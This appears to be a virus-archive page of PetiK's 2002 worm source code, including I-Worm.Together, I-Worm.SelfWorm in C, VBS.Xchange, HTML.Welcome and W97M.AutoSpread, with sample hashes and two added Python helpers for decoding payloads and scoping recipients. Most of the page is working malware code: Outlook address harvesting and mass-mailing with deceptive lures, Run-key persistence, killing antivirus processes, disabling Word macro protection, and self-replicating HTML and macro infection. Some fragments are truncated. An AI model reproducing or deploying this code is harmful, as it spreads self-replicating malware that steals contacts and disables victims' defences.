dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?
s_vbs:
db 'On Error Resume Next',CRLF
db 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set sys=fs.GetSpecialFolder(1)',CRLF
db 'Set c=fs.CreateTextFile(sys&"\together.ini")',CRLF
db 'c.Close',CRLF
db 'Set ou=CreateObject("Outlook.Application")',CRLF
db 'Set map=ou.GetNameSpace("MAPI")',CRLF
db 'adr=""',CRLF
db 'For Each mel in map.AddressLists',CRLF
db 'If mel.AddressEntries.Count <> 0 Then',CRLF
db 'For O=1 To mel.AddressEntries.Count',CRLF
db 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'adr=adr &";#"',CRLF,CRLF
db 'Set c=fs.OpenTextFile(sys&"\together.ini",2)',CRLF
db 'c.WriteLine adr',CRLF
db 'c.Close',CRLF
e_vbs:
end start_worm
end
File Together.exe received on 05.16.2009 19:41:01 (CET)
Additional information
File size: 5120 bytes
MD5...: 91703278352e9e18d01d081c73330ec2
SHA1..: 81366149cda1578b5dc71b4c4860f9555467e1a4
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
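Together harvests addresses in two stages: the dropped eBase.vbs (the s_vbs block) writes every Outlook address into together.ini as a ';'-separated list ending in '#', and the scan_mail loop in Spread_Worm reads that file back, skipping space characters, stopping at '#', and mailing only entries that contain '@'. For incident scoping, the same file tells you exactly who received the lure mail. The Python below is an added example, not code from the archive: it parses together.ini with the worm's own rules and returns the accepted addresses, the entries the worm would have skipped, and the domains involved. The file content is constructed.

```python
"""Recover the recipient list from the together.ini drop file that I-Worm.Together's
VBS stage writes and its assembly stage (scan_mail) reads.
Added example, not part of the archive; the sample content below is constructed."""


def parse_together_ini(text):
    """Return (addresses, rejected): entries the worm would have mailed and those it
    would have skipped, applying the same rules as its scan_mail loop."""
    addresses, rejected = [], []
    body = text.split("#", 1)[0]          # '#' terminates the list (f_mail in the asm)
    for entry in body.split(";"):
        entry = entry.replace(" ", "")    # the asm skips space characters (car_s)
        entry = entry.replace("\r", "").replace("\n", "")
        if not entry:
            continue                      # the leading ';' yields an empty first entry
        if "@" in entry:                  # edx counts '@'; zero means no mail is sent
            addresses.append(entry)
        else:
            rejected.append(entry)
    return addresses, rejected


def unique_domains(addresses):
    """Domains touched, for scoping which organisations received the lure mail."""
    return sorted({a.rsplit("@", 1)[1].lower() for a in addresses})


# Constructed content in the exact shape the VBS stage produces:
# adr="" then adr & ";" & address per entry, then ";#".
SAMPLE_TOGETHER_INI = ";alice@example.com;Bob Smith;bob @example.org;;carol@example.com;#\r\n"

if __name__ == "__main__":
    accepted, skipped = parse_together_ini(SAMPLE_TOGETHER_INI)
    print("mailed:", accepted)
    print("skipped:", skipped)
    print("domains:", unique_domains(accepted))
```

Entries without '@' are typically Exchange display names or X.400 addresses returned by AddressEntry.Address; they are worth keeping in the report because they still identify contacts whose address books the worm enumerated.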
/*
Start : April 1st 2002
Name : I-Worm.SelfWorm
Coder : PetiK
Language : C
*/
#include <windows.h>
#include <stdio.h>
#include <mapi.h>
#include <tlhelp32.h>
#include <winver.h>
#include "SelfWorm.h"
char filename[100],cpywrm[100],copy2[100],start[100];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
LPTSTR cmdLine,ptr;
BOOL installed,rProcessFound;
HANDLE fd,lSnapshot,myproc;
BYTE desktop[50],favoris[50],personal[50],cache[50],startup[100];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),sizstartup=sizeof(startup);
DWORD type=REG_SZ;
FILE *vbsworm;
LHANDLE session;
MapiMessage mess;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;
HKEY hReg;
PROCESSENTRY32 uProcess;
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
RegQueryValueEx(hReg,"Startup",0,&type,startup,&sizstartup);
RegCloseKey(hReg);
GetModuleFileName(hInstance,filename,100);
GetSystemDirectory((char *)cpywrm,100);
strcat(cpywrm,"\\ShellW32.exe");
CopyFile(filename,cpywrm,0);
strcpy(copy2,cpywrm);
strcat(copy2," -i");
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Shell32",0,REG_SZ,(BYTE *)copy2,100);
RegCloseKey(hReg);
installed=FALSE;
cmdLine=GetCommandLine();
if(cmdLine) {
for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
if(ptr[0]=='-' && ptr[1]!=0) {
switch(ptr[1]) {
default:
break;
case 'i':
installed=TRUE;
break;
}
}
}
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI,"MAPISendMail");
(FARPROC &)mLogon=GetProcAddress(hMAPI,"MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI,"MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI,"MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI,"MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI,"MAPIFreeBuffer");
if(!installed) {
if(!RegisterWin95(&wc))
return FALSE;
hInst = hInstance;
hWnd = CreateWindow (lpszAppName,
lpszTitle,
WS_OVERLAPPEDWINDOW|WS_MAXIMIZEBOX,
150,150,300,200,NULL,NULL,hInstance,NULL);
if(!hWnd)
return FALSE;
; ShowWindow(hWnd, nCmdShow);
ShowWindow(hWnd,SW_SHOWNORMAL);
UpdateWindow(hWnd);
while(GetMessage(&msg, NULL, 0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return(msg.wParam);
}
else
{
MessageBox(NULL,"SelfWorm actif","SelfWorm",MB_OK|MB_ICONINFORMATION);
FreeLibrary(hMAPI);
}
}
BOOL RegisterWin95(CONST WNDCLASS* lpwc)
{
WNDCLASSEX wcex;
wcex.style = lpwc->style;
wcex.lpfnWndProc = lpwc->lpfnWndProc;
wcex.cbClsExtra = lpwc->cbClsExtra;
wcex.cbWndExtra = lpwc->cbWndExtra;
wcex.hInstance = lpwc->hInstance;
wcex.hIcon = lpwc->hIcon;
wcex.hCursor = lpwc->hCursor;
wcex.hbrBackground = lpwc->hbrBackground;
wcex.lpszMenuName = lpwc->lpszMenuName;
wcex.lpszClassName = lpwc->lpszClassName;
wcex.cbSize = sizeof(WNDCLASSEX);
wcex.hIconSm = LoadIcon(wcex.hInstance, "TDW");
return RegisterClassEx(&wcex);
}
LRESULT CALLBACK WndProc( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
static HWND hEdit = NULL;
switch(uMsg)
{
case WM_INITDIALOG:
hEdit=CreateWindow( "BUTTON", "ABOUT",WS_CHILD | WS_VISIBLE |
BS_PUSHBUTTON,0,0,290,190,hWnd,(HMENU)IDM_ABOUT,hInst,NULL );
break;
case WM_COMMAND:
switch(LOWORD(wParam))
{
case IDM_ABOUT:
MessageBox(NULL,"Written by PetiK. (c)2002","I-Worm.SelfWorm",
MB_OK|MB_ICONINFORMATION);
break;
case IDM_MIRC:
mirc("C:\\mirc\\script.ini");
mirc("C:\\mirc32\\script.ini");
mirc("C:\\Program Files\\mirc\\script.ini");
mirc("C:\\Program Files\\mirc32\\script.ini");
mirc("C:\\progra~1\\mirc\\script.ini");
mirc("C:\\progra~1\\mirc32\\script.ini");
break;
case IDM_STOPAV:
StopAV("AVP32.EXE"); // AVP
StopAV("AVPCC.EXE"); // AVP
StopAV("AVPM.EXE"); // AVP
StopAV("WFINDV32.EXE"); // Dr. Solomon
StopAV("F-AGNT95.EXE"); // F-Secure
StopAV("NAVAPW32.EXE"); // Norton Antivirus
StopAV("NAVW32.EXE"); // Norton Antivirus
StopAV("NMAIN.EXE"); // Norton Antivirus
StopAV("PAVSCHED.EXE"); // Panda AntiVirus
StopAV("ZONEALARM.EXE"); // ZoneAlarm
break;
case IDM_STARTUP:
strcpy(start,startup);
strcat(start,"\\Shell32.exe");
CopyFile(filename,"C:\\hello.exe",0);
break;
case IDM_VBSSPREAD:
vbsworm=fopen("C:\\selfworm.vbs","w");
fprintf(vbsworm,"On Error Resume Next\n");
fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n");
fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application%c)\n",34,34);
fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34);
fprintf(vbsworm,"For Each C In MA.AddressLists\n");
fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n");
fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n");
fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n");
fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n");
fprintf(vbsworm,"EM.To=AD.Address\n");
fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c look at this.%c\n",34,34,34,34);
fprintf(vbsworm,"body=%cI found this on the web.%c\n",34,34);
fprintf(vbsworm,"body = body & VbCrLf & %cOpen this funny tool.%c\n",34,34);
fprintf(vbsworm,"EM.Body=body\n");
fprintf(vbsworm,"EM.Attachments.Add(%c%s%c)\n",34,cpywrm,34);
fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n");
fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34);
fprintf(vbsworm,"EM.Send\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fclose(vbsworm);
ShellExecute(NULL,"open","C:\\selfworm.vbs",NULL,NULL,SW_SHOWNORMAL);
Sleep(3000);
DeleteFile("C:\\selfworm.vbs");
break;
case IDM_READMAIL:
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);
mes->ulReserved=0;
mes->lpszSubject="Re: NEW MAIL.";
mes->lpszNoteText="Here you have a new mail with a funny tool. No danger.\n"
" See you soon.";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;
mes->lpRecips->lpszName=mname;
mes->lpRecips->lpszAddress=maddr;
mes->nFileCount=1;
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
mes->lpFiles->ulReserved=0;
mes->lpFiles->flFlags=NULL;
mes->lpFiles->nPosition=-1;
mes->lpFiles->lpszPathName=filename;
mes->lpFiles->lpszFileName="funny_tool.exe";
mes->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mes, NULL, NULL);
}
}
while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mes->lpFiles);
mFreeBuffer(mes);
mLogoff(session,0,0,0);
}
break;
case IDM_EXIT :
FreeLibrary(hMAPI);
DestroyWindow(hWnd);
break;
}
break;
case WM_DESTROY :
PostQuitMessage(0);
break;
default:
return (DefWindowProc(hWnd, uMsg, wParam, lParam));
}
return(0L);
}
Additional information
File size: 29696 bytes
MD5...: e1a99c8d213bd20c976cabc1afb709f3
SHA1..: f886237a582c9bb29b30bb00e87dda8a067150f7
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
' Name : VBS.Xchange.A
' Author : PetiK
' Language : VBS
' Date : 27/04/2002
Set win=fso.GetSpecialFolder(0)
fcopy=win&"\MSXchange.vbs"
reg="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
fso.GetFile(WScript.ScriptFullName).Copy(fcopy)
ws.RegWrite reg&"\MsExchange",fcopy
set sp=fso.CreateTextFile("C:\XChange.vba",True,8)
sp.WriteLine "Attribute VB_Name = ""Xchange"""
sp.WriteLine "Sub AutoOpen()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "e = """""
e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f+e
If Len(f)=110 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If
If Len(virus)-i = 0 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If
Next
sp.WriteLine "read=dec(e)"
sp.WriteLine "Open ""C:\xchange.vbs"" For Output As #1"
sp.WriteLine "Print #1, read"
sp.WriteLine "Close #1"
sp.WriteLine "Shell ""wscript C:\xchange.vbs"""
sp.WriteLine "Call infect_fichier"
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub HelpAbout()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "MsgBox ""This is my very first VBS-W97M Worm"", vbInformation, ""I-Worm.Xchange"""
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub AutoClose()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "FileSystem.Kill ""C:\xchange.vbs"""
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub infect_fichier()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "Set nor = NormalTemplate.VBProject.VBComponents"
sp.WriteLine "Set doc = ActiveDocument.VBProject.VBComponents"
sp.WriteLine "df = ""C:\XChange.vba"""
sp.WriteLine "If nor.Item(""Xchange"").Name <> ""Xchange"" Then"
sp.WriteLine " doc(""Xchange"").Export df"
sp.WriteLine " nor.Import df"
sp.WriteLine "End If"
sp.WriteLine "If doc.Item(""Xchange"").Name <> ""Xchange"" Then"
sp.WriteLine " nor(""Xchange"").Export df"
sp.WriteLine " doc.Import df"
sp.WriteLine " ActiveDocument.Save"
sp.WriteLine "End If"
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Function dec(octe)"
sp.WriteLine "For hexad = 1 To Len(octe) Step 2"
sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))"
sp.WriteLine "Next"
sp.WriteLine "End Function"
sp.Close
infvbs(win)
infvbs(fso.GetSpecialFolder(1))
SendWithOutlook()
Set wd=CreateObject("Word.Application")
Set vba=wd.NormalTemplate.VBProject.VBComponents
If vba.Item("Xchange").Name <> "Xchange" Then
vba.Import "C:\XChange.vba"
wd.Application.NormalTemplate.Save
End If
wd.Application.NormalTemplate.Close
wd.Application.Quit
Set mel=fso.CreateTextFile(win&"\kitep.wab.txt",8,TRUE)
counter=0
lect()
mel.WriteLine "#"
mel.Close
WScript.Quit
Sub lect()
On Error Resume Next
Set dr=fso.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
list(d.path&"\")
End If
Next
End Sub
Sub spreadmailto(dir)
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFolder(dir)
Set cf=f.Files
For Each fil in cf
ext=fso.GetExtensionName(fil.path)
ext=lcase(ext)
if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then
set htm=fso.OpenTextFile(fil.path,1)
verif=True
allhtm=htm.ReadAll()
htm.Close
For ml=1 To Len(allhtm)
count=0
If Mid(allhtm,ml,7) = "mailto:" Then
counter=counter+1
mlto=""
Do While Mid(allhtm,ml+6+count,1) <> """"
count=count+1
mlto = mlto + Mid(allhtm,ml+6+count,1)
loop
mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">"
sendmailto(left(mlto,len(mlto)-1))
End If
Next
End If
Next
End Sub
Sub list(dir)
On Error Resume Next
Set f=fso.GetFolder(dir)
Set ssf=f.SubFolders
For Each fil in ssf
spreadmailto(fil.path)
list(fil.path)
Next
End Sub
Sub sendmailto(email)
Set out=CreateObject("Outlook.Application")
Set mailmelto=out.CreateItem(0)
mailmelto.To email
mailmelto.Subject "Upgrade Ms Exchange"
mailmelto.Body "Run this attached file to upgrade Ms Exchange"
mailmelto.Attachment.Add (WScript.ScriptFullName)
mailmelto.DeleteAfterSubmit = True
mailmelto.Send
Set out = Nothing
End Sub
Sub SendWithOutlook()
Set A=CreateObject("Outlook.Application")
Set B=A.GetNameSpace("MAPI")
For Each C In B.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.count
Set E=C.AddressEntries(D)
Set F=A.CreateItem(0)
F.To=E.Address
F.Subject="Update and upgrade MS Exchange."
F.Body="run this attached file to update Ms Exchange. See you soon."
Set G=CreateObject("Scripting.FileSystemObject")
F.Attachments.Add(fcopy)
F.DeleteAfterSubmit=True
If F.To <> "" Then
F.Send
End If
Next
End If
Next
End Sub
Function infvbs(Folder)
If f.FolderExists(Folder) then
End If
Next
End If
End Function
File Xchange_A.vbs received on 05.16.2009 20:03:44 (CET)
Additional information
File size: 5770 bytes
MD5...: de34d735d30bd0e107e14bb6aa8bf3e0
SHA1..: 8d976194e4ae851e0408c53f0db41f9c6f994a46
' Name : VBS.Xchange.B aka RasLFront (because of the French presidential election in 2002)
' Author : PetiK
' Language : VBS
' Date : 05/05/2002
Set win=fso.GetSpecialFolder(0)
fcopy=win&"\XchgFix.vbs"
reg="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
'fso.GetFile(WScript.ScriptFullName).Copy(fcopy)
'ws.RegWrite reg&"\MsExchangeFix",fcopy
set sp=fso.CreateTextFile("C:\rlf.sys",True,8)
sp.WriteLine "Private Sub Document_Open()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "e = """""
e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f+e
If Len(f)=110 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If
If Len(virus)-i = 0 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If
Next
Set wrd=CreateObject("Word.Application")
wrd.Options.virusprotection=0
wrd.Options.savenormalprompt=0
wrd.Options.confirmconversion=0
If wrd.normaltemplate.vbproject.vbcomponents(1).name <> "raslfront" Then
wrd.normaltemplate.vbproject.vbcomponents(1).codemodule.addfromFile("C:\rlf.sys")
wrd.normaltemplate.vbproject.vbcomponents(1).name="raslfront"
MsgBox "Pas Encore"
End If
wrd.Application.Quit
WScript.Quit
<welcome>
<html><head><title>Welcome</title>
<body onLoad="window.status='Welcome to my last creation'">
<SCRIPT Language=VBScript>
On Error Resume Next
msgbox "Please accept the ActiveX",vbinformation,"MSIE Warning !"
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
If err.number=429 then
ws.Run javascript:location.reload()
Else
vbsn=""
For vbsname=1 To 8
randomize(timer)
vbsn=vbsn & chr(int(rnd(1)*26)+65)
Next
vbsn=vbsn&".vbs"
htms=document.body.createTextRange.htmltext
Set vbsf=fso.CreateTextFile("C:\"&vbsn,2,True)
vbsf.WriteLine "Set fs=CreateObject(""Scripting.FileSystemObject"")"
vbsf.WriteLine "Set ws=CreateObject(""WScript.Shell"")"
vbsf.Write "htm="""
vbsf.Write """"
vbsf.WriteLine ""
vbsf.WriteLine "Set newhtm=fs.CreateTextFile(""C:\Welcome2U.htm"",True,2)"
vbsf.WriteLine "newhtm.WriteLine ""<welcome>"""
vbsf.WriteLine "newhtm.WriteLine ""<html><head><title>Welcome</title>"""
vbsf.WriteLine "newhtm.WriteLine ""<body onLoad=""""window.status='Welcome to my last creation'"""">"""
vbsf.WriteLine "read="""""
vbsf.WriteLine "For pos=1 To Len(htm) Step 2"
vbsf.WriteLine "read=read " &Chr(38)& " Chr(""" &Chr(38)& "h"""&Chr(38)& " Mid(htm,pos,2))"
vbsf.WriteLine "Next"
vbsf.WriteLine "newhtm.Write read"
vbsf.WriteLine "newhtm.WriteLine ""</body></html>"""
vbsf.WriteLine "newhtm.Close"
vbsf.WriteLine "ws.Run ""C:\Welcome2U.htm"""
vbsf.Close
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set out=CreateObject("Outlook.Application")
Set map=out.GetNameSpace("MAPI")
For Each adr In map.AddressLists
If adr.AddressEntries <> 0 Then
For addr=1 To adr.Addressentries.Count
Set nadr=adr.AddressEntries(addr)
Set mel=out.CreateItem(0)
mel.To=nadr.Address
mel.Subject="A Gift from your best friend"
mel.Body="This is for you (" &left(vbsn,8)& ")."
mel.Attachments.Add("C:\"&vbsn)
mel.Send
Next
End If
Next
infect(win)
infect(sys)
infect(fso.GetSpecialFolder(1))
infect(ws.SpecialFolders("MyDocuments"))
infect(ws.SpecialFolders("Desktop"))
infect(ws.SpecialFolders("Favorites"))
infect(ws.SpecialFolders("Recent"))
If Day(Now())=7 Then
document.write "<font face='Lucida Console' size='2' color=black>Welcome to my last creation : HTML.Welcome.A<br>Coded by PetiK/[rRlf]<br></font>"
Else
document.write "<font face='Lucida Console' size='3' color=black>Welcome To You !<br>Have a nice day.<br></font>"
End If
End If
Function infect(doss)
Set FolderObj = FSO.GetFolder(doss)
Set FO = FolderObj.Files
For each cible in FO
ext = lcase(FSO.GetExtensionName(cible.Name))
if ext="htm" or ext="html" or ext="htz" or ext="hta" or ext="asp" Then
Set good = fso.OpenTextFile(cible.path, 1, False)
if good.readline <> "<welcome>" Then
good.close()
Set good = fso.OpenTextFile(cible.path, 1, False)
htmorg = good.ReadAll()
good.close()
Set virus = document.body.createTextRange
Set good = fso.CreateTextFile(cible.path, True, False)
good.WriteLine "<welcome>"
good.Write(htmorg)
good.WriteLine virus.htmltext
good.Close()
else
good.close()
end if
end if
next
End Function
</script>
</body></html>
YVQAVQXD.vbs
Set fs=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
htm="0D0A3C534352495054206C61...6E67756167543E"
Set newhtm=fs.CreateTextFile("C:\Welcome2U.htm",True,2)
newhtm.WriteLine "<welcome>"
newhtm.WriteLine "<html><head><title>Welcome</title>"
newhtm.WriteLine "<body onLoad=""window.status='Welcome to my last creation'"">"
read=""
For pos=1 To Len(htm) Step 2
read=read & Chr("&h"& Mid(htm,pos,2))
Next
newhtm.Write read
newhtm.WriteLine "</body></html>"
newhtm.Close
ws.Run "C:\Welcome2U.htm"
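Both VBS.Xchange (the `e = e + "..."` chunks that its `dec()` function turns back into a script) and HTML.Welcome (the single `htm="..."` string decoded with `Chr("&h" & Mid(htm,pos,2))`) carry their payload as a plain hex dump of the script text. The helper below is an added analysis example, not code from this archive: it pulls either encoding out of a dropped file and returns the embedded script so it can be read without running it. The sample inputs are constructed here; the Xchange sample encodes a harmless `On Error Resume Next` line rather than the worm body, and the Welcome sample is only the visible prefix of the page's `htm=` string (the rest is elided on the page). Decoding bytes above 0x7F as latin-1 is an assumption; VBScript's `Chr()` is code-page dependent there.

```python
import re

# Added analysis helper (not part of PetiK's code): undo the hex encoding that the VBS.Xchange
# dropper (`e = e + "..."` chunks decoded by dec()) and the HTML.Welcome dropper
# (`htm="..."` decoded by Chr("&h" & Mid(htm,pos,2))) use to carry their payload.

CHUNK_LINE = re.compile(r'^\s*e\s*=\s*e\s*\+\s*"([0-9A-Fa-f]*)"\s*$', re.M)   # Xchange: 110-char chunks
HTM_LINE = re.compile(r'^\s*htm\s*=\s*"([0-9A-Fa-f]+)"\s*$', re.M)             # Welcome: one long string


def decode_hex_pairs(hexstr):
    """Equivalent of the VBScript loop: every two hex digits become one character via Chr(&hXX).
    Chr() is code-page dependent for bytes above 0x7F; latin-1 is an assumption that keeps every
    byte value unchanged so nothing is lost."""
    hexstr = "".join(hexstr.split())
    if len(hexstr) % 2:
        raise ValueError("odd number of hex digits: string is truncated or not a hex payload")
    return bytes.fromhex(hexstr).decode("latin-1")


def recover_payload(dropper_text):
    """Return the embedded script from either dropper format, or None if neither is present."""
    chunks = CHUNK_LINE.findall(dropper_text)
    if chunks:
        return decode_hex_pairs("".join(chunks))
    m = HTM_LINE.search(dropper_text)
    return decode_hex_pairs(m.group(1)) if m else None


# Constructed sample in the shape of the module VBS.Xchange writes to C:\XChange.vba; the hex
# here encodes a harmless two-chunk "On Error Resume Next" line, not the real worm body.
XCHANGE_SAMPLE = '''Attribute VB_Name = "Xchange"
Sub AutoOpen()
On Error Resume Next
e = ""
e = e + "4F6E204572726F7220"
e = e + "526573756D65204E6578740D0A"
read=dec(e)
'''

# The only part of the page's YVQAVQXD.vbs `htm=` string that is visible (the rest is elided with "...").
WELCOME_SAMPLE = 'htm="0D0A3C534352495054206C61"\n'

if __name__ == "__main__":
    print(repr(recover_payload(XCHANGE_SAMPLE)))   # 'On Error Resume Next\r\n'
    print(repr(recover_payload(WELCOME_SAMPLE)))   # '\r\n<SCRIPT la'
```

Run it against a dropped `.vba`/`.sys` module or a generated `.vbs` file; an odd digit count means the file was cut short, which is exactly what the "..." on this page shows.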
File Welcome.htm received on 05.16.2009 19:58:08 (CET)
Additional information
File size: 3349 bytes
MD5...: 8b66aadcff8510521ba7f0bacb6fc54a
SHA1..: e1022a03f29f2ffd74764d6e4547b691c16991bc
' Name : W97M.AutoSpread
' Author : PetiK
' Language : VBA Word
' Date : 09/05/2002
Sub AutoOpen()
nam = ActiveDocument.Name
vnam = Left(nam, Len(nam) - 4)
Call FuckProtection
Call InfectWord
Call Spread
If Day(Now) = 8 Then
MsgBox "This Document is infected by W97M." + vnam, vbCritical, "W97M." + vnam + ".A"
End If
End Sub
Sub InfectWord()
On Error Resume Next
Set nor = NormalTemplate.VBProject.VBComponents
Set doc = ActiveDocument.VBProject.VBComponents
srcmod = "C:\kitep.drv"
If nor.Item("AutoSpread").Name <> "AutoSpread" Then
doc("AutoSpread").Export srcmod
nor.Import srcmod
End If
If doc.Item("AutoSpread").Name <> "AutoSpread" Then
nor("AutoSpread").Export srcmod
doc.Import srcmod
ActiveDocument.Save
End If
Kill (srcmod)
End Sub
Sub FuckProtection()
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
Case "9.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End Select
WordBasic.DisableAutoMacros 0
End Sub
Sub Spread()
On Error Resume Next
subj = Left(ActiveDocument.Name, Len(ActiveDocument.Name) - 4)
att = ActiveDocument.FullName
win = Environ("windir")
FileSystem.MkDir win + "\AutoSpread"
x = 0
nfile = ""
Do While x < 8
Randomize (Timer)
nfile = nfile + Chr(Int(Rnd(1) * 8) + 48)
x = x + 1
Loop
reg = nfile
nfile = nfile + ".vbs"
nfile = win + "\AutoSpread\" + nfile
Open nfile For Output As #1
Print #1, "'From W97M.AutoSpread"
Print #1, "On Error Resume Next"
Print #1, "Set out=CreateObject(""Outlook.Application"")"
Print #1, "Set map=out.GetNameSpace(""MAPI"")"
Print #1, "For Each C in map.AddressLists"
Print #1, "If C.AddressEntries.Count <> 0 Then"
Print #1, "For D=1 To C.AddressEntries.Count"
Print #1, "Set E=C.AddressEntries(D)"
Print #1, "Set env=out.CreateItem(0)"
Print #1, "env.To=E.Address"
Print #1, "env.Subject=""" + subj + """"
Print #1, "env.Body=""This confidential document is for you."""
Print #1, "env.Attachments.Add(""" + att + """)"
Print #1, "env.DeleteAfterSubmit=True"
Print #1, "If env.To <> """" Then"
Print #1, "env.Send"
Print #1, "End If"
Print #1, "Next"
Print #1, "End If"
Print #1, "Next"
Print #1, "WScript.Quit"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", reg) = nfile
End Sub
Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "W97M.AutoSpread.A coded by PetiK (c)2002"
.Heading = "W97M.AutoSpread"
.Animation = msoAnimationGetAttentionMajor
.Button = msoButtonSetOK
.Show
End With
slp = Sleep(5000)
End Sub
76406570.vbs
'From W97M.AutoSpread
On Error Resume Next
Set out=CreateObject("Outlook.application")
Set map=out.GetNameSpace("MAPI")
For Each C in map.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
Set E=C.AddressEntries(D)
Set env=out.CreateItem(0)
env.To=E.Address
env.Subject="HelloWorld"
env.Body="This confidential document is for you."
